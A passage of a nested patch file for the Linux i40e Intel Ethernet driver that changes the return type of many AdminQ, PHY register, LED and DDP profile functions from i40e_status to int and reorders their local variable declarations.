+  * @bw_data: Buffer holding enabled TCs, relative/absolute TC BW limit/credits
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
++int
++i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
+ 	u16 seid,
+ 	struct i40e_aqc_configure_switching_comp_bw_config_data *bw_data,
+ 	struct i40e_asq_cmd_details *cmd_details)
+@@ -4173,10 +4033,11 @@ i40e_status i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold VSI BW configuration
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
++			    u16 seid,
++			    struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
++			    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_vsi_bw_config,
+@@ -4190,10 +4051,11 @@ i40e_status i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold VSI BW configuration per TC
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
++				 u16 seid,
++				 struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_vsi_ets_sla_config,
+@@ -4207,10 +4069,11 @@ i40e_status i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold switching component's per TC BW config
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
++				     u16 seid,
++				     struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
++				     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				   i40e_aqc_opc_query_switching_comp_ets_config,
+@@ -4224,10 +4087,11 @@ i40e_status i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold current ETS configuration for the Physical Port
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_port_ets_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_port_ets_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_port_ets_config(struct i40e_hw *hw,
++			      u16 seid,
++			      struct i40e_aqc_query_port_ets_config_resp *bw_data,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_port_ets_config,
+@@ -4241,10 +4105,11 @@ i40e_status i40e_aq_query_port_ets_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold switching component's BW configuration
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
++				    u16 seid,
++				    struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
++				    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_switching_comp_bw_config,
+@@ -4263,8 +4128,9 @@ i40e_status i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
+  * Returns 0 if the values passed are valid and within
+  * range else returns an error.
+  **/
+-static i40e_status i40e_validate_filter_settings(struct i40e_hw *hw,
+-				struct i40e_filter_control_settings *settings)
++static int
++i40e_validate_filter_settings(struct i40e_hw *hw,
++			      struct i40e_filter_control_settings *settings)
+ {
+ 	u32 fcoe_cntx_size, fcoe_filt_size;
+ 	u32 fcoe_fmax;
+@@ -4350,11 +4216,11 @@ static i40e_status i40e_validate_filter_settings(struct i40e_hw *hw,
+  * for a single PF. It is expected that these settings are programmed
+  * at the driver initialization time.
+  **/
+-i40e_status i40e_set_filter_control(struct i40e_hw *hw,
+-				struct i40e_filter_control_settings *settings)
++int i40e_set_filter_control(struct i40e_hw *hw,
++			    struct i40e_filter_control_settings *settings)
+ {
+-	i40e_status ret = 0;
+ 	u32 hash_lut_size = 0;
++	int ret = 0;
+ 	u32 val;
+ 
+ 	if (!settings)
+@@ -4424,11 +4290,11 @@ i40e_status i40e_set_filter_control(struct i40e_hw *hw,
+  * In return it will update the total number of perfect filter count in
+  * the stats member.
+  **/
+-i40e_status i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
+-				u8 *mac_addr, u16 ethtype, u16 flags,
+-				u16 vsi_seid, u16 queue, bool is_add,
+-				struct i40e_control_filter_stats *stats,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
++					  u8 *mac_addr, u16 ethtype, u16 flags,
++					  u16 vsi_seid, u16 queue, bool is_add,
++					  struct i40e_control_filter_stats *stats,
++					  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_control_packet_filter *cmd =
+@@ -4437,7 +4303,7 @@ i40e_status i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_remove_control_packet_filter_completion *resp =
+ 		(struct i40e_aqc_add_remove_control_packet_filter_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (vsi_seid == 0)
+ 		return I40E_ERR_PARAM;
+@@ -4483,7 +4349,7 @@ void i40e_add_filter_to_drop_tx_flow_control_frames(struct i40e_hw *hw,
+ 		   I40E_AQC_ADD_CONTROL_PACKET_FLAGS_DROP |
+ 		   I40E_AQC_ADD_CONTROL_PACKET_FLAGS_TX;
+ 	u16 ethtype = I40E_FLOW_CONTROL_ETHTYPE;
+-	i40e_status status;
++	int status;
+ 
+ 	status = i40e_aq_add_rem_control_packet_filter(hw, NULL, ethtype, flag,
+ 						       seid, 0, true, NULL,
+@@ -4505,14 +4371,14 @@ void i40e_add_filter_to_drop_tx_flow_control_frames(struct i40e_hw *hw,
+  * is not passed then only register at 'reg_addr0' is read.
+  *
+  **/
+-static i40e_status i40e_aq_alternate_read(struct i40e_hw *hw,
+-					  u32 reg_addr0, u32 *reg_val0,
+-					  u32 reg_addr1, u32 *reg_val1)
++static int i40e_aq_alternate_read(struct i40e_hw *hw,
++				  u32 reg_addr0, u32 *reg_val0,
++				  u32 reg_addr1, u32 *reg_val1)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_alternate_write *cmd_resp =
+ 		(struct i40e_aqc_alternate_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!reg_val0)
+ 		return I40E_ERR_PARAM;
+@@ -4541,12 +4407,12 @@ static i40e_status i40e_aq_alternate_read(struct i40e_hw *hw,
+  *
+  * Suspend port's Tx traffic
+  **/
+-i40e_status i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
+-				    struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
++			    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_tx_sched_ind *cmd;
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	cmd = (struct i40e_aqc_tx_sched_ind *)&desc.params.raw;
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_suspend_port_tx);
+@@ -4563,11 +4429,11 @@ i40e_status i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
+  *
+  * Resume port's Tx traffic
+  **/
+-i40e_status i40e_aq_resume_port_tx(struct i40e_hw *hw,
+-				   struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_resume_port_tx(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_resume_port_tx);
+ 
+@@ -4637,18 +4503,18 @@ void i40e_set_pci_config_data(struct i40e_hw *hw, u16 link_status)
+  * Dump internal FW/HW data for debug purposes.
+  *
+  **/
+-i40e_status i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
+-			       u8 table_id, u32 start_index, u16 buff_size,
+-			       void *buff, u16 *ret_buff_size,
+-			       u8 *ret_next_table, u32 *ret_next_index,
+-			       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
++		       u8 table_id, u32 start_index, u16 buff_size,
++		       void *buff, u16 *ret_buff_size,
++		       u8 *ret_next_table, u32 *ret_next_index,
++		       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_debug_dump_internals *cmd =
+ 		(struct i40e_aqc_debug_dump_internals *)&desc.params.raw;
+ 	struct i40e_aqc_debug_dump_internals *resp =
+ 		(struct i40e_aqc_debug_dump_internals *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (buff_size == 0 || !buff)
+ 		return I40E_ERR_PARAM;
+@@ -4689,12 +4555,12 @@ i40e_status i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
+  *
+  * Read bw from the alternate ram for the given pf
+  **/
+-i40e_status i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
+-				      u32 *max_bw, u32 *min_bw,
+-				      bool *min_valid, bool *max_valid)
++int i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
++			      u32 *max_bw, u32 *min_bw,
++			      bool *min_valid, bool *max_valid)
+ {
+-	i40e_status status;
+ 	u32 max_bw_addr, min_bw_addr;
++	int status;
+ 
+ 	/* Calculate the address of the min/max bw registers */
+ 	max_bw_addr = I40E_ALT_STRUCT_FIRST_PF_OFFSET +
+@@ -4729,13 +4595,14 @@ i40e_status i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
+  *
+  * Configure partitions guaranteed/max bw
+  **/
+-i40e_status i40e_aq_configure_partition_bw(struct i40e_hw *hw,
+-			struct i40e_aqc_configure_partition_bw_data *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_configure_partition_bw(struct i40e_hw *hw,
++			       struct i40e_aqc_configure_partition_bw_data *bw_data,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+-	i40e_status status;
+-	struct i40e_aq_desc desc;
+ 	u16 bwd_size = sizeof(*bw_data);
++	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_configure_partition_bw);
+@@ -4764,11 +4631,11 @@ i40e_status i40e_aq_configure_partition_bw(struct i40e_hw *hw,
+  *
+  * Reads specified PHY register value
+  **/
+-i40e_status i40e_read_phy_register_clause22(struct i40e_hw *hw,
+-					    u16 reg, u8 phy_addr, u16 *value)
++int i40e_read_phy_register_clause22(struct i40e_hw *hw,
++				    u16 reg, u8 phy_addr, u16 *value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
+ 	u8 port_num = (u8)hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
+ 	u32 command = 0;
+ 	u16 retry = 1000;
+ 
+@@ -4809,11 +4676,11 @@ i40e_status i40e_read_phy_register_clause22(struct i40e_hw *hw,
+  *
+  * Writes specified PHY register value
+  **/
+-i40e_status i40e_write_phy_register_clause22(struct i40e_hw *hw,
+-					     u16 reg, u8 phy_addr, u16 value)
++int i40e_write_phy_register_clause22(struct i40e_hw *hw,
++				     u16 reg, u8 phy_addr, u16 value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
+ 	u8 port_num = (u8)hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
+ 	u32 command  = 0;
+ 	u16 retry = 1000;
+ 
+@@ -4850,13 +4717,13 @@ i40e_status i40e_write_phy_register_clause22(struct i40e_hw *hw,
+  *
+  * Reads specified PHY register value
+  **/
+-i40e_status i40e_read_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 *value)
++int i40e_read_phy_register_clause45(struct i40e_hw *hw,
++				    u8 page, u16 reg, u8 phy_addr, u16 *value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
++	u8 port_num = hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
+ 	u32 command = 0;
+ 	u16 retry = 1000;
+-	u8 port_num = hw->func_caps.mdio_port_num;
+ 
+ 	command = (reg << I40E_GLGEN_MSCA_MDIADD_SHIFT) |
+ 		  (page << I40E_GLGEN_MSCA_DEVADD_SHIFT) |
+@@ -4924,13 +4791,13 @@ phy_read_end:
+  *
+  * Writes value to specified PHY register
+  **/
+-i40e_status i40e_write_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 value)
++int i40e_write_phy_register_clause45(struct i40e_hw *hw,
++				     u8 page, u16 reg, u8 phy_addr, u16 value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
+-	u32 command = 0;
+-	u16 retry = 1000;
+ 	u8 port_num = hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
++	u16 retry = 1000;
++	u32 command = 0;
+ 
+ 	command = (reg << I40E_GLGEN_MSCA_MDIADD_SHIFT) |
+ 		  (page << I40E_GLGEN_MSCA_DEVADD_SHIFT) |
+@@ -4991,10 +4858,10 @@ phy_write_end:
+  *
+  * Writes value to specified PHY register
+  **/
+-i40e_status i40e_write_phy_register(struct i40e_hw *hw,
+-				    u8 page, u16 reg, u8 phy_addr, u16 value)
++int i40e_write_phy_register(struct i40e_hw *hw,
++			    u8 page, u16 reg, u8 phy_addr, u16 value)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	switch (hw->device_id) {
+ 	case I40E_DEV_ID_1G_BASE_T_X722:
+@@ -5030,10 +4897,10 @@ i40e_status i40e_write_phy_register(struct i40e_hw *hw,
+  *
+  * Reads specified PHY register value
+  **/
+-i40e_status i40e_read_phy_register(struct i40e_hw *hw,
+-				   u8 page, u16 reg, u8 phy_addr, u16 *value)
++int i40e_read_phy_register(struct i40e_hw *hw,
++			   u8 page, u16 reg, u8 phy_addr, u16 *value)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	switch (hw->device_id) {
+ 	case I40E_DEV_ID_1G_BASE_T_X722:
+@@ -5082,17 +4949,17 @@ u8 i40e_get_phy_address(struct i40e_hw *hw, u8 dev_num)
+  *
+  * Blinks PHY link LED
+  **/
+-i40e_status i40e_blink_phy_link_led(struct i40e_hw *hw,
+-				    u32 time, u32 interval)
++int i40e_blink_phy_link_led(struct i40e_hw *hw,
++			    u32 time, u32 interval)
+ {
+-	i40e_status status = 0;
+-	u32 i;
+-	u16 led_ctl;
+-	u16 gpio_led_port;
+-	u16 led_reg;
+ 	u16 led_addr = I40E_PHY_LED_PROV_REG_1;
++	u16 gpio_led_port;
+ 	u8 phy_addr = 0;
++	int status = 0;
++	u16 led_ctl;
+ 	u8 port_num;
++	u16 led_reg;
++	u32 i;
+ 
+ 	i = rd32(hw, I40E_PFGEN_PORTNUM);
+ 	port_num = (u8)(i & I40E_PFGEN_PORTNUM_PORT_NUM_MASK);
+@@ -5154,12 +5021,12 @@ phy_blinking_end:
+  * @led_addr: LED register address
+  * @reg_val: read register value
+  **/
+-static enum i40e_status_code i40e_led_get_reg(struct i40e_hw *hw, u16 led_addr,
+-					      u32 *reg_val)
++static int i40e_led_get_reg(struct i40e_hw *hw, u16 led_addr,
++			    u32 *reg_val)
+ {
+-	enum i40e_status_code status;
+ 	u8 phy_addr = 0;
+ 	u8 port_num;
++	int status;
+ 	u32 i;
+ 
+ 	*reg_val = 0;
+@@ -5188,12 +5055,12 @@ static enum i40e_status_code i40e_led_get_reg(struct i40e_hw *hw, u16 led_addr,
+  * @led_addr: LED register address
+  * @reg_val: register value to write
+  **/
+-static enum i40e_status_code i40e_led_set_reg(struct i40e_hw *hw, u16 led_addr,
+-					      u32 reg_val)
++static int i40e_led_set_reg(struct i40e_hw *hw, u16 led_addr,
++			    u32 reg_val)
+ {
+-	enum i40e_status_code status;
+ 	u8 phy_addr = 0;
+ 	u8 port_num;
++	int status;
+ 	u32 i;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_AQ_PHY_ACCESS_CAPABLE) {
+@@ -5223,17 +5090,17 @@ static enum i40e_status_code i40e_led_set_reg(struct i40e_hw *hw, u16 led_addr,
+  * @val: original value of register to use
+  *
+  **/
+-i40e_status i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
+-			     u16 *val)
++int i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
++		     u16 *val)
+ {
+-	i40e_status status = 0;
+ 	u16 gpio_led_port;
+ 	u8 phy_addr = 0;
+-	u16 reg_val;
++	u32 reg_val_aq;
++	int status = 0;
+ 	u16 temp_addr;
++	u16 reg_val;
+ 	u8 port_num;
+ 	u32 i;
+-	u32 reg_val_aq;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_AQ_PHY_ACCESS_CAPABLE) {
+ 		status =
+@@ -5278,12 +5145,12 @@ i40e_status i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
+  * Set led's on or off when controlled by the PHY
+  *
+  **/
+-i40e_status i40e_led_set_phy(struct i40e_hw *hw, bool on,
+-			     u16 led_addr, u32 mode)
++int i40e_led_set_phy(struct i40e_hw *hw, bool on,
++		     u16 led_addr, u32 mode)
+ {
+-	i40e_status status = 0;
+ 	u32 led_ctl = 0;
+ 	u32 led_reg = 0;
++	int status = 0;
+ 
+ 	status = i40e_led_get_reg(hw, led_addr, &led_reg);
+ 	if (status)
+@@ -5327,14 +5194,14 @@ restore_config:
+  * Use the firmware to read the Rx control register,
+  * especially useful if the Rx unit is under heavy pressure
+  **/
+-i40e_status i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 *reg_val,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
++				 u32 reg_addr, u32 *reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_rx_ctl_reg_read_write *cmd_resp =
+ 		(struct i40e_aqc_rx_ctl_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!reg_val)
+ 		return I40E_ERR_PARAM;
+@@ -5358,8 +5225,8 @@ i40e_status i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
+  **/
+ u32 i40e_read_rx_ctl(struct i40e_hw *hw, u32 reg_addr)
+ {
+-	i40e_status status = 0;
+ 	bool use_register;
++	int status = 0;
+ 	int retry = 5;
+ 	u32 val = 0;
+ 
+@@ -5393,14 +5260,14 @@ do_retry:
+  * Use the firmware to write to an Rx control register,
+  * especially useful if the Rx unit is under heavy pressure
+  **/
+-i40e_status i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 reg_val,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
++				  u32 reg_addr, u32 reg_val,
++				  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_rx_ctl_reg_read_write *cmd =
+ 		(struct i40e_aqc_rx_ctl_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_rx_ctl_reg_write);
+ 
+@@ -5420,8 +5287,8 @@ i40e_status i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
+  **/
+ void i40e_write_rx_ctl(struct i40e_hw *hw, u32 reg_addr, u32 reg_val)
+ {
+-	i40e_status status = 0;
+ 	bool use_register;
++	int status = 0;
+ 	int retry = 5;
+ 
+ 	use_register = (((hw->aq.api_maj_ver == 1) &&
+@@ -5483,16 +5350,16 @@ static void i40e_mdio_if_number_selection(struct i40e_hw *hw, bool set_mdio,
+  * NOTE: In common cases MDIO I/F number should not be changed, thats why you
+  * may use simple wrapper i40e_aq_set_phy_register.
+  **/
+-enum i40e_status_code i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
+-			     u8 phy_select, u8 dev_addr, bool page_change,
+-			     bool set_mdio, u8 mdio_num,
+-			     u32 reg_addr, u32 reg_val,
+-			     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
++				 u8 phy_select, u8 dev_addr, bool page_change,
++				 bool set_mdio, u8 mdio_num,
++				 u32 reg_addr, u32 reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_phy_register_access *cmd =
+ 		(struct i40e_aqc_phy_register_access *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_phy_register);
+@@ -5528,16 +5395,16 @@ enum i40e_status_code i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
+  * NOTE: In common cases MDIO I/F number should not be changed, thats why you
+  * may use simple wrapper i40e_aq_get_phy_register.
+  **/
+-enum i40e_status_code i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+-			     u8 phy_select, u8 dev_addr, bool page_change,
+-			     bool set_mdio, u8 mdio_num,
+-			     u32 reg_addr, u32 *reg_val,
+-			     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
++				 u8 phy_select, u8 dev_addr, bool page_change,
++				 bool set_mdio, u8 mdio_num,
++				 u32 reg_addr, u32 *reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_phy_register_access *cmd =
+ 		(struct i40e_aqc_phy_register_access *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_phy_register);
+@@ -5568,18 +5435,17 @@ enum i40e_status_code i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+  * @error_info: returns error information
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum
+-i40e_status_code i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
+-				   u16 buff_size, u32 track_id,
+-				   u32 *error_offset, u32 *error_info,
+-				   struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
++		      u16 buff_size, u32 track_id,
++		      u32 *error_offset, u32 *error_info,
++		      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_write_personalization_profile *cmd =
+ 		(struct i40e_aqc_write_personalization_profile *)
+ 		&desc.params.raw;
+ 	struct i40e_aqc_write_ddp_resp *resp;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_write_personalization_profile);
+@@ -5612,15 +5478,14 @@ i40e_status_code i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
+  * @flags: AdminQ command flags
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum
+-i40e_status_code i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
+-				      u16 buff_size, u8 flags,
+-				      struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
++			 u16 buff_size, u8 flags,
++			 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_applied_profiles *cmd =
+ 		(struct i40e_aqc_get_applied_profiles *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_personalization_profile_list);
+@@ -5719,14 +5584,13 @@ i40e_find_section_in_profile(u32 section_type,
+  * @hw: pointer to the hw struct
+  * @aq: command buffer containing all data to execute AQ
+  **/
+-static enum
+-i40e_status_code i40e_ddp_exec_aq_section(struct i40e_hw *hw,
+-					  struct i40e_profile_aq_section *aq)
++static int i40e_ddp_exec_aq_section(struct i40e_hw *hw,
++				    struct i40e_profile_aq_section *aq)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	u8 *msg = NULL;
+ 	u16 msglen;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, aq->opcode);
+ 	desc.flags |= cpu_to_le16(aq->flags);
+@@ -5766,14 +5630,14 @@ i40e_status_code i40e_ddp_exec_aq_section(struct i40e_hw *hw,
+  *
+  * Validates supported devices and profile's sections.
+  */
+-static enum i40e_status_code
++static int
+ i40e_validate_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 		      u32 track_id, bool rollback)
+ {
+ 	struct i40e_profile_section_header *sec = NULL;
+-	i40e_status status = 0;
+ 	struct i40e_section_table *sec_tbl;
+ 	u32 vendor_dev_id;
++	int status = 0;
+ 	u32 dev_cnt;
+ 	u32 sec_off;
+ 	u32 i;
+@@ -5831,16 +5695,16 @@ i40e_validate_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Handles the download of a complete package.
+  */
+-enum i40e_status_code
++int
+ i40e_write_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 		   u32 track_id)
+ {
+-	i40e_status status = 0;
+-	struct i40e_section_table *sec_tbl;
+ 	struct i40e_profile_section_header *sec = NULL;
+ 	struct i40e_profile_aq_section *ddp_aq;
+-	u32 section_size = 0;
++	struct i40e_section_table *sec_tbl;
+ 	u32 offset = 0, info = 0;
++	u32 section_size = 0;
++	int status = 0;
+ 	u32 sec_off;
+ 	u32 i;
+ 
+@@ -5894,15 +5758,15 @@ i40e_write_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Rolls back previously loaded package.
+  */
+-enum i40e_status_code
++int
+ i40e_rollback_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 		      u32 track_id)
+ {
+ 	struct i40e_profile_section_header *sec = NULL;
+-	i40e_status status = 0;
+ 	struct i40e_section_table *sec_tbl;
+ 	u32 offset = 0, info = 0;
+ 	u32 section_size = 0;
++	int status = 0;
+ 	u32 sec_off;
+ 	int i;
+ 
+@@ -5946,15 +5810,15 @@ i40e_rollback_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Register a profile to the list of loaded profiles.
+  */
+-enum i40e_status_code
++int
+ i40e_add_pinfo_to_list(struct i40e_hw *hw,
+ 		       struct i40e_profile_segment *profile,
+ 		       u8 *profile_info_sec, u32 track_id)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_profile_section_header *sec = NULL;
+ 	struct i40e_profile_info *pinfo;
+ 	u32 offset = 0, info = 0;
++	int status = 0;
+ 
+ 	sec = (struct i40e_profile_section_header *)profile_info_sec;
+ 	sec->tbl_size = 1;
+@@ -5988,7 +5852,7 @@ i40e_add_pinfo_to_list(struct i40e_hw *hw,
+  * of the function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_cloud_filters_element_data *filters,
+ 			  u8 filter_count)
+@@ -5996,8 +5860,8 @@ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 buff_len;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_add_cloud_filters);
+@@ -6025,7 +5889,7 @@ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 seid,
+  * function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 			     struct i40e_aqc_cloud_filters_element_bb *filters,
+ 			     u8 filter_count)
+@@ -6033,8 +5897,8 @@ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
